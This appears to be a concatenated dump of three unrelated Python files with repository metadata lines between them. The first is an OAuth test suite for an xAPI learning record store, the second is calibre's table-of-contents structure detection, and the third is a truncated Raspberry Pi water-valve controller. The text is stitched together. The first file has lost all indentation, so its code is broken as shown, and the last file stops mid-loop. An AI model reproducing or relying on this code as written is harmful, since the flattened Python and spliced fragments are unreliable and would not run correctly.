post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='define statements/write')
# from_token_and_callback takes a dictionary
post_param_list = post_oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/',
parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer2, post_access_token)
post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
# This adds the act_def to the very first activity created in this test since this has define scope
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
acts = Activity.objects.all()
# One canonical act from jane, one local act for the oauth group jane is in (it lacks the
# define scope), and one local act for dick's oauth group
self.assertEqual(len(acts), 3)
global_act = Activity.objects.get(canonical_version=True)
global_name_list = global_act.activity_definition_name
self.assertEqual(global_name_list, {})
global_desc_list = global_act.activity_definition_description
self.assertEqual(global_desc_list, {})
jane_agent = Agent.objects.get(mbox="mailto:[email protected]")
jane_oauth_group = Agent.objects.get(objectType='Group', member__in=[jane_agent])
non_global_act_jane_oauth = Activity.objects.get(canonical_version=False, authority=jane_oauth_group)
non_global_name_list_jane_oauth = non_global_act_jane_oauth.activity_definition_name.values()
self.assertIn('testname', non_global_name_list_jane_oauth)
self.assertIn('altname', non_global_name_list_jane_oauth)
non_global_desc_list_jane_oauth = non_global_act_jane_oauth.activity_definition_description.values()
self.assertIn('testdesc', non_global_desc_list_jane_oauth)
self.assertIn('altdesc', non_global_desc_list_jane_oauth)
dick_agent = Agent.objects.get(mbox="mailto:[email protected]")
dick_oauth_group = Agent.objects.get(objectType='Group', member__in=[dick_agent])
non_global_act_dick_oauth = Activity.objects.get(canonical_version=False, authority=dick_oauth_group)
non_global_name_list_dick_oauth = non_global_act_dick_oauth.activity_definition_name.values()
self.assertIn('definename', non_global_name_list_dick_oauth)
self.assertIn('definealtname', non_global_name_list_dick_oauth)
non_global_desc_list_dick_oauth = non_global_act_dick_oauth.activity_definition_description.values()
self.assertIn('definedesc', non_global_desc_list_dick_oauth)
self.assertIn('definealtdesc', non_global_desc_list_dick_oauth)
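# Behavior exercised above: a token without the define scope writes a local
# (canonical_version=False) copy of the activity scoped to its OAuth consumer
# group, while the canonical version keeps its original (empty) definition.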
def test_define_scope_agent(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/helped",
"display": {"en-US":"helped"}},"object": {"objectType":"Agent", "mbox":"mailto:[email protected]",
"name":"tim"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/talked","display": {"en-US":"talked"}},
"object": {"objectType":"Agent", "mbox":"mailto:[email protected]","name":"tim timson"}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
agents = Agent.objects.all().values_list('name', flat=True)
# Jane, Anonymous agent for account, Group for jane and account, bill, bob, tim, tim timson
self.assertEqual(len(agents), 7)
self.assertIn('tim', agents)
self.assertIn('tim timson', agents)
tim = Agent.objects.get(name='tim timson')
self.assertFalse(tim.canonical_version)
tim = Agent.objects.get(name='tim')
self.assertTrue(tim.canonical_version)
# =================================================
# START GET STMT
get_params = {"agent":{"objectType": "Agent", "mbox":"mailto:[email protected]"}, "related_agents":True}
path = "%s?%s" % (url, urllib.urlencode(get_params))
# Use same oauth headers, replace nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get_resp = self.client.get(path, X_Experience_API_Version="1.0.0",
Authorization=new_oauth_headers)
self.assertEqual(get_resp.status_code, 200)
content = json.loads(get_resp.content)
# Should only be one statement since the query is by tim's mbox; it only picks up the global tim object
self.assertEqual(len(content['statements']), 1)
self.client.logout()
# ==================================================
# START OF POST WITH ANOTHER HANDSHAKE
# Anonymous group that will make 2 canonical agents
ot = "Group"
members = [{"name":"john doe","mbox":"mailto:[email protected]"},
{"name":"jan doe","mbox":"mailto:[email protected]"}]
kwargs = {"objectType":ot, "member": members, "name": "doe group"}
global_group, created = Agent.objects.retrieve_or_create(**kwargs)
# Anonymous group that will retrieve two agents and create one more canonical agent
members = [{"name":"john doe","mbox":"mailto:[email protected]"},
{"name":"jan doe","mbox":"mailto:[email protected]"},
{"name":"dave doe", "mbox":"mailto:[email protected]"}]
kwargs1 = {"objectType":ot, "member": members, "name": "doe group"}
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/assisted","display": {"en-US":"assisted"}},
"object": kwargs1}
stmt_json = json.dumps(post_stmt)
post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
post_param_list = post_oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/',
parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer2,
post_access_token)
post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
agents = Agent.objects.all()
# These 4 agents are all non-global since they were created w/o define scope
non_globals = Agent.objects.filter(canonical_version=False).values_list('name', flat=True)
self.assertEqual(len(non_globals), 4)
self.assertIn('bill', non_globals)
self.assertIn('tim timson', non_globals)
self.assertIn('dom', non_globals)
self.assertIn('doe group', non_globals)
# 2 oauth group objects, all of the agents created via member lists or directly, and 2 anonymous
# account agents for the accounts in the oauth groups
global_agents = Agent.objects.filter(canonical_version=True).values_list('name', flat=True)
self.assertEqual(len(global_agents), 12)
self.assertIn('bob', global_agents)
self.assertIn('tim', global_agents)
self.assertIn('jan doe', global_agents)
self.assertIn('john doe', global_agents)
self.assertIn('dave doe', global_agents)
self.assertIn('jane', global_agents)
self.assertIn('dick', global_agents)
self.assertIn('doe group', global_agents)
def test_default_scope_multiple_requests(self):
oauth_header_resource_params, access_token = self.oauth_handshake(scope=False)
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
# from_token_and_callback takes a dictionary
post_param_list = oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
post = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
# ====================================================
stmt2 = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/failed","display": {"en-US":"failed"}},
"object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
# Use same oauth headers, replace nonce
post_oauth_header_resource_params_dict['oauth_nonce'] = 'post_differ_nonce'
# Create oauth request and add signature
post_oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict)
post_signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
post_signature2 = post_signature_method2.sign(post_oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % post_signature, '"%s"' % post_signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="post_differ_nonce"')
resp = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt2, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_update_activity_with_oauth_containing_user(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - should update existing activity since jane is in oauth group
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
acts = Activity.objects.all()
self.assertEqual(len(acts), 1)
act = acts[0].to_dict()
self.assertEqual(act['id'], 'test://test/define/scope')
self.assertIn('definition', act)
def test_update_activity_created_with_oauth(self):
url = 'http://testserver/XAPI/statements'
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statement - no activity with this id exists yet, so the PUT creates it with the oauth group (containing jane) as its authority
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
# ==================================================================
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
acts = Activity.objects.all()
self.assertEqual(len(acts), 1)
act = acts[0].to_dict()
self.assertEqual(act['id'], 'test://test/define/scope')
self.assertIn('definition', act)
def test_multiple_client_get(self):
url = 'http://testserver/XAPI/statements'
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statement - no activity with this id exists yet in this test, so the PUT creates it
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
# ==================================================================
# build stmt data and path
put_guid2 = str(uuid.uuid1())
stmt2 = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://mult-test"}}
param2 = {"statementId":put_guid2}
path2 = "%s?%s" % (url, urllib.urlencode(param2))
# START PUT STMT
oauth_header_resource_params2, access_token2 = self.oauth_handshake(scope_type='statements/write define', consumer=self.consumer2jane)
# from_token_and_callback takes a dictionary
param_list2 = oauth_header_resource_params2.split(",")
oauth_header_resource_params_dict2 = {}
for p in param_list2:
item = p.split("=")
oauth_header_resource_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict2['OAuth realm']
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token2, http_method='PUT',
http_url=path2, parameters=oauth_header_resource_params_dict2)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer2jane, access_token2)
oauth_header_resource_params2 += ',oauth_signature="%s"' % signature2
# Put statements - should update existing activity since jane is in oauth group
resp2 = self.client.put(path2, data=stmt2, content_type="application/json",
Authorization=oauth_header_resource_params2, X_Experience_API_Version="1.0.0")
self.assertEqual(resp2.status_code, 204)
# ==================================================================
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# ==================================================================
stmt_get = self.client.get(reverse(statements), X_Experience_API_Version="1.0.0", Authorization=self.jane_auth)
self.assertEqual(stmt_get.status_code, 200)
content = json.loads(stmt_get.content)
self.assertEqual(len(content['statements']), 3)
jane_clients = Consumer.objects.filter(user=self.user)
self.assertEqual(len(jane_clients), 2) | daafgo/Server_LRS | lrs/tests/OAuthTests.py | Python | apache-2.0 | 161,641 | 0.009385 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import re, uuid
from lxml import etree
from urlparse import urlparse
from collections import OrderedDict, Counter
from calibre.ebooks.oeb.base import XPNSMAP, TOC, XHTML, xml2text, barename
from calibre.ebooks import ConversionError
def XPath(x):
try:
return etree.XPath(x, namespaces=XPNSMAP)
except etree.XPathSyntaxError:
raise ConversionError(
'The syntax of the XPath expression %s is invalid.' % repr(x))
def isspace(x):
return not x or x.replace(u'\xa0', u'').isspace()
def at_start(elem):
' Return True if there is no content before elem '
body = XPath('ancestor-or-self::h:body')(elem)
if not body:
return True
body = body[0]
ancestors = frozenset(XPath('ancestor::*')(elem))
for x in body.iter():
if x is elem:
return True
if hasattr(getattr(x, 'tag', None), 'rpartition') and x.tag.rpartition('}')[-1] in {'img', 'svg'}:
return False
if isspace(getattr(x, 'text', None)) and (x in ancestors or isspace(getattr(x, 'tail', None))):
continue
return False
return False
class DetectStructure(object):
def __call__(self, oeb, opts):
self.log = oeb.log
self.oeb = oeb
self.opts = opts
self.log('Detecting structure...')
self.detect_chapters()
if self.oeb.auto_generated_toc or opts.use_auto_toc:
orig_toc = self.oeb.toc
self.oeb.toc = TOC()
self.create_level_based_toc()
if self.oeb.toc.count() < 1:
if not opts.no_chapters_in_toc and self.detected_chapters:
self.create_toc_from_chapters()
if self.oeb.toc.count() < opts.toc_threshold:
self.create_toc_from_links()
if self.oeb.toc.count() < 2 and orig_toc.count() > 2:
self.oeb.toc = orig_toc
else:
self.oeb.auto_generated_toc = True
self.log('Auto generated TOC with %d entries.' %
self.oeb.toc.count())
if opts.toc_filter is not None:
regexp = re.compile(opts.toc_filter)
for node in list(self.oeb.toc.iter()):
if not node.title or regexp.search(node.title) is not None:
self.log('Filtering', node.title if node.title else
'empty node', 'from TOC')
self.oeb.toc.remove(node)
if opts.page_breaks_before is not None:
pb_xpath = XPath(opts.page_breaks_before)
for item in oeb.spine:
for elem in pb_xpath(item.data):
try:
prev = elem.itersiblings(tag=etree.Element,
preceding=True).next()
if (barename(elem.tag) in {'h1', 'h2'} and barename(
prev.tag) in {'h1', 'h2'} and (not prev.tail or
not prev.tail.split())):
# We have two adjacent headings, do not put a page
# break on the second one
continue
except StopIteration:
pass
style = elem.get('style', '')
if style:
style += '; '
elem.set('style', style+'page-break-before:always')
for node in self.oeb.toc.iter():
if not node.title or not node.title.strip():
node.title = _('Unnamed')
if self.opts.start_reading_at:
self.detect_start_reading()
def detect_start_reading(self):
expr = self.opts.start_reading_at
try:
expr = XPath(expr)
except:
self.log.warn(
'Invalid start reading at XPath expression, ignoring: %s'%expr)
return
for item in self.oeb.spine:
if not hasattr(item.data, 'xpath'):
continue
matches = expr(item.data)
if matches:
elem = matches[0]
eid = elem.get('id', None)
if not eid:
eid = u'start_reading_at_'+unicode(uuid.uuid4()).replace(u'-', u'')
elem.set('id', eid)
if u'text' in self.oeb.guide:
self.oeb.guide.remove(u'text')
self.oeb.guide.add(u'text', u'Start', item.href+u'#'+eid)
self.log('Setting start reading at position to %s in %s'%(
self.opts.start_reading_at, item.href))
return
self.log.warn("Failed to find start reading at position: %s"%
self.opts.start_reading_at)
def get_toc_parts_for_xpath(self, expr):
# if an attribute is selected by the xpath expr then truncate it
# from the path and instead return it as where to find the title text
        title_attribute_regex = re.compile(r'/@([-\w]+)$')
match = title_attribute_regex.search(expr)
if match is not None:
return expr[0:match.start()], match.group(1)
return expr, None
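    # For example (illustrative only):
    #   '//h:h2/@title'  ->  ('//h:h2', 'title')   # title read from the attribute
    #   '//h:h2'         ->  ('//h:h2', None)      # title read from the element text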
def detect_chapters(self):
self.detected_chapters = []
self.chapter_title_attribute = None
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid chapter expression, ignoring: %s'%expr)
return []
if self.opts.chapter:
chapter_path, title_attribute = self.get_toc_parts_for_xpath(self.opts.chapter)
self.chapter_title_attribute = title_attribute
for item in self.oeb.spine:
for x in find_matches(chapter_path, item.data):
self.detected_chapters.append((item, x))
chapter_mark = self.opts.chapter_mark
page_break_before = 'display: block; page-break-before: always'
page_break_after = 'display: block; page-break-after: always'
c = Counter()
for item, elem in self.detected_chapters:
c[item] += 1
text = xml2text(elem).strip()
text = re.sub(r'\s+', ' ', text.strip())
self.log('\tDetected chapter:', text[:50])
if chapter_mark == 'none':
continue
if chapter_mark == 'rule':
mark = etree.Element(XHTML('hr'))
elif chapter_mark == 'pagebreak':
if c[item] < 3 and at_start(elem):
# For the first two elements in this item, check if they
# are at the start of the file, in which case inserting a
                    # page break is unnecessary and can lead to extra blank
# pages in the PDF Output plugin. We need to use two as
# feedbooks epubs match both a heading tag and its
# containing div with the default chapter expression.
continue
mark = etree.Element(XHTML('div'), style=page_break_after)
else: # chapter_mark == 'both':
mark = etree.Element(XHTML('hr'), style=page_break_before)
try:
elem.addprevious(mark)
except TypeError:
self.log.exception('Failed to mark chapter')
def create_level_based_toc(self):
if self.opts.level1_toc is not None:
self.add_leveled_toc_items()
def create_toc_from_chapters(self):
counter = self.oeb.toc.next_play_order()
for item, elem in self.detected_chapters:
text, href = self.elem_to_link(item, elem, self.chapter_title_attribute, counter)
self.oeb.toc.add(text, href, play_order=counter)
counter += 1
def create_toc_from_links(self):
num = 0
for item in self.oeb.spine:
for a in XPath('//h:a[@href]')(item.data):
href = a.get('href')
try:
purl = urlparse(href)
except ValueError:
self.log.warning('Ignoring malformed URL:', href)
continue
if not purl[0] or purl[0] == 'file':
href, frag = purl.path, purl.fragment
href = item.abshref(href)
if frag:
href = '#'.join((href, frag))
if not self.oeb.toc.has_href(href):
text = xml2text(a)
text = text[:100].strip()
if (not self.opts.duplicate_links_in_toc and
self.oeb.toc.has_text(text)):
continue
num += 1
self.oeb.toc.add(text, href,
play_order=self.oeb.toc.next_play_order())
if self.opts.max_toc_links > 0 and \
num >= self.opts.max_toc_links:
self.log('Maximum TOC links reached, stopping.')
return
def elem_to_link(self, item, elem, title_attribute, counter):
text = ''
if title_attribute is not None:
text = elem.get(title_attribute, '')
if not text:
text = xml2text(elem).strip()
if not text:
text = elem.get('title', '')
if not text:
text = elem.get('alt', '')
text = re.sub(r'\s+', ' ', text.strip())
text = text[:1000].strip()
id = elem.get('id', 'calibre_toc_%d'%counter)
elem.set('id', id)
href = '#'.join((item.href, id))
return text, href
def add_leveled_toc_items(self):
added = OrderedDict()
added2 = OrderedDict()
counter = 1
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid ToC expression, ignoring: %s'%expr)
return []
for document in self.oeb.spine:
previous_level1 = list(added.itervalues())[-1] if added else None
previous_level2 = list(added2.itervalues())[-1] if added2 else None
level1_toc, level1_title = self.get_toc_parts_for_xpath(self.opts.level1_toc)
for elem in find_matches(level1_toc, document.data):
text, _href = self.elem_to_link(document, elem, level1_title, counter)
counter += 1
if text:
node = self.oeb.toc.add(text, _href,
play_order=self.oeb.toc.next_play_order())
added[elem] = node
# node.add(_('Top'), _href)
if self.opts.level2_toc is not None and added:
level2_toc, level2_title = self.get_toc_parts_for_xpath(self.opts.level2_toc)
for elem in find_matches(level2_toc, document.data):
level1 = None
for item in document.data.iterdescendants():
if item in added:
level1 = added[item]
elif item == elem:
if level1 is None:
if previous_level1 is None:
break
level1 = previous_level1
text, _href = self.elem_to_link(document, elem, level2_title, counter)
counter += 1
if text:
added2[elem] = level1.add(text, _href,
play_order=self.oeb.toc.next_play_order())
break
if self.opts.level3_toc is not None and added2:
level3_toc, level3_title = self.get_toc_parts_for_xpath(self.opts.level3_toc)
for elem in find_matches(level3_toc, document.data):
level2 = None
for item in document.data.iterdescendants():
if item in added2:
level2 = added2[item]
elif item == elem:
if level2 is None:
if previous_level2 is None:
break
level2 = previous_level2
text, _href = \
self.elem_to_link(document, elem, level3_title, counter)
counter += 1
if text:
level2.add(text, _href,
play_order=self.oeb.toc.next_play_order())
break
| sharad/calibre | src/calibre/ebooks/oeb/transforms/structure.py | Python | gpl-3.0 | 13,406 | 0.00358 |
#!/usr/bin/python
import sys, signal, logging, time, subprocess, RPi.GPIO as GPIO
FLOATSW_HIGH_WL = 26 # high water level float switch
WATER_VALVE = 10 # GPIO port for the Water Electo valve, High by default after boot
VALVE_CHGSTATE_TIMER = 25 # Electro valve needs roughly 20 seconds to switch from open to close and vice versa
logger = None
def Setup():
global logger
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/var/log/rodi.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s',"%Y-%m-%d %H:%M:%S")
handler.setFormatter(formatter)
logger.addHandler(handler)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(WATER_VALVE, GPIO.OUT)
GPIO.setup(FLOATSW_HIGH_WL, GPIO.IN, pull_up_down=GPIO.PUD_UP) #, initial = GPIO.HIGH)
if not sys.stdout.isatty():
sys.stderr = open('/var/log/rodi_stderr.log', 'a')
sys.stdout = open('/var/log/rodi_stdout.log', 'a')
def Alert(message):
global logger
logger.info(message) # log the event
print(message)
logger.handlers[0].flush()
def Close_valve():
GPIO.output(WATER_VALVE, False)
Alert("Closing the RO/DI valve")
def Open_valve():
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened")
sys.exit(5)
else:
Alert("Opening the RO/DI valve")
GPIO.output(WATER_VALVE, True)
time.sleep(VALVE_CHGSTATE_TIMER)
def Refilling():
if GPIO.input(WATER_VALVE) == True:
return True
else:
return False
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
if not len(sys.argv) > 1:
print("You must provide one numerical argument to this function (duration in seconds). Exiting.")
sys.exit(1)
if sys.argv[1] != "close" and sys.argv[1] != "stop" and not sys.argv[1].isdigit():
print("Value is neither 'close', 'stop' or a refill duration expressed in seconds")
sys.exit(1)
i = 0
killer = GracefulKiller()
Setup()
if sys.argv[1] == "close" or sys.argv[1] == "stop":
Close_valve()
if str.count(subprocess.check_output(["ps", "aux"]), "rodi") > 1:
Alert("Warning, we were called while another instance of rodi.py was already in Memory")
sys.exit(1)
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump already high, refilling would be dangerous, exiting")
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened while high water in the sump, closing.")
Close_valve()
sys.exit(3)
if sys.argv[1].isdigit():
Alert("Not already refilling, sump water level normal, proceeding.")
Alert("Refilling for " + sys.argv[1] + " seconds")
try:
Open_valve()
while i<VALVE_CHGSTATE_TIMER+int(sys.argv[1]):
